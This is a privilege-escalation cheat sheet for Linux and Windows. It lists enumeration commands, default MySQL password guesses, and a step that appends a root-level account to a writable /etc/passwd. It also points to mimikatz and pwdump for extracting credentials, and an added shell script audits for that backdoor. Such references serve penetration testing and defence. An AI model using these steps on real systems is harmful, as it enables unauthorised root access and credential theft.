Privilege Escalation Techniques

A cheat sheet and quick reference for privilege escalation enumeration across various systems. Consider it a reference point.

Linux

Upgrade shell

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
# Ctrl + Z (background the shell), then on the local terminal:
stty raw -echo ; fg ; reset
stty columns 200 rows 200
# Serve files from the current directory (file transfer helper)
python3 -m http.server 31337

Sudo rights

sudo -l
ls -salth /etc/sudoers

SUID & GUID

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

RWX directories

# Enumerate places you most likely have rwx.
/tmp/
/var/tmp/
/dev/shm/

# World-Writable Files and Directories
find / -type f -perm -o=w 2>/dev/null
find / -type d -perm -o=w 2>/dev/null

Kernel, issue and release

# Look for unpatched kernel exploits
uname -a
cat /etc/*-release
cat /etc/issue
file /bin/bash

Root processes

# Check for services running as root.
ps aux |grep -i 'root' --color=auto

Network enumeration

netstat -antup
netstat -tunlp

Always check

ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/
ls -lsaht /var/lib/
ls -lsaht /var/db/

ls -lsaR /home/ # .ssh keys
ls -lsaht |grep -i '\.conf' --color=auto # .conf files

Cron

crontab -u root -l

cat /etc/crontab
ls /etc/cron.*

Find .secret files

ls -lsaht |grep -i '\.secret' --color=auto

Web config creds

cd /var/www/html/
ls -lsaht

Users

cd /home/
ls -lsaht

cat /etc/passwd

MySQL root access

mysql -uroot -p
# At the "Enter Password:" prompt, try the common defaults:
# root : root
# root : toor
# root : (empty password)

Writable /etc/passwd

# Generate an MD5-crypt hash (prompts for a password; here: hack4fun)
openssl passwd -1
# Example output:
# $1$hXUuF5iI$hTj2iYkVREvSGZbUfA9yG1
echo 'tox:$1$hXUuF5iI$hTj2iYkVREvSGZbUfA9yG1:0:0:tox:/home/tox:/bin/bash' >> /etc/passwd
su tox
id
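As an added defensive check that is not part of the original cheat sheet, this POSIX shell script audits a passwd-format file for what the technique above leaves behind: an extra UID-0 account, a password hash stored inline instead of the shadow marker, and a passwd file writable by others. The sample file and the account name tox are constructed for the demonstration; on a live host the same functions take /etc/passwd.

```shell
#!/bin/sh
# Added audit script (not from the original cheat sheet). It checks a passwd-format
# file for the artefacts an appended UID-0 entry leaves behind. The path argument
# lets it run against a constructed sample as well as the real /etc/passwd.

# Print account names that have UID 0 other than root.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print accounts whose password field holds a hash rather than a shadow marker.
inline_password_hashes() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print $1 }' "$1"
}

# Print 1 if the "other" write bit is set on the file, else 0.
# Column 9 of `ls -ld` output is the other-write flag, which is portable.
world_writable() {
    case "$(ls -ld "$1" | cut -c9)" in
        w) echo 1 ;;
        *) echo 0 ;;
    esac
}

# Constructed sample passwd file for demonstration only; the "tox" line is the
# kind of entry the section above appends.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tox:$1$hXUuF5iI$hTj2iYkVREvSGZbUfA9yG1:0:0:tox:/home/tox:/bin/bash
alice:x:1000:1000:alice:/home/alice:/bin/bash
EOF

echo "Extra UID-0 accounts:   $(extra_uid0_accounts "$SAMPLE")"
echo "Inline password hashes: $(inline_password_hashes "$SAMPLE")"
echo "World-writable:         $(world_writable "$SAMPLE")"
```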

File System Mounts

# Find exotic file mounts
cat /etc/fstab

I/O Operations

# Find out if the system is 32 or 64 bit (see `file /bin/bash` above), then transfer the matching pspy binary.
cd /var/tmp/
# File transfer --> pspy32 or pspy64
chmod 755 pspy32 pspy64
# Run the binary that matches the architecture
./pspy<32/64>

Scripts

linPEAS

GTFOBins

Windows

Unquoted Service Paths

# If an unquoted service path contains spaces, Windows resolves each space-delimited prefix in turn, so a malicious executable placed along the path could run with the service's elevated permissions.
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

Scheduled Tasks and Services

# Some tasks or services might be misconfigured to run files that low-privileged users can modify.
# You can use tools like schtasks or net start to list tasks and services, then check permissions on the associated files or folders.

Weak File/Folder Permissions

# Misconfigured permissions on files or folders can allow an attacker to modify, replace, or execute files with elevated permissions.
# Tools like accesschk (from Sysinternals) can help identify overly permissive settings.
accesschk.exe -uws "Everyone" C:\

Stored Credentials

# Windows systems sometimes have credentials stored in various locations, like the registry, Group Policy Preferences, or in configuration files.
# Tools like mimikatz can be used to extract plaintext passwords and hashes from memory.

Misconfigurations

Windows Credential Manager

# Windows Credential Manager:
# Stores user credentials for various services and applications. It can be accessed via Control Panel or the cmdkey command.

SAM

# SAM (Security Accounts Manager) File:
# Located at C:\Windows\System32\config\SAM, this file stores local user account passwords in a hashed format.
# This file isn’t directly accessible while the OS is running. Tools like Mimikatz or pwdump can be used to extract hashes.

NTDS.dit

# NTDS.dit:
# This file is relevant for domain controllers. It contains Active Directory data, including user credentials.
# Located at C:\Windows\NTDS\NTDS.dit.

Directories

# User Directories:
# Searching through a user’s documents, desktop, and downloads might reveal saved passwords or authentication tokens.
# Common paths include C:\Users\[USERNAME]\Documents, C:\Users\[USERNAME]\Desktop, and C:\Users\[USERNAME]\Downloads.

Pagefile.sys and Hiberfil.sys

# Pagefile.sys and Hiberfil.sys:
# These system files might contain plaintext passwords or other sensitive data left behind in memory. Directly analyzing them can sometimes yield useful information.
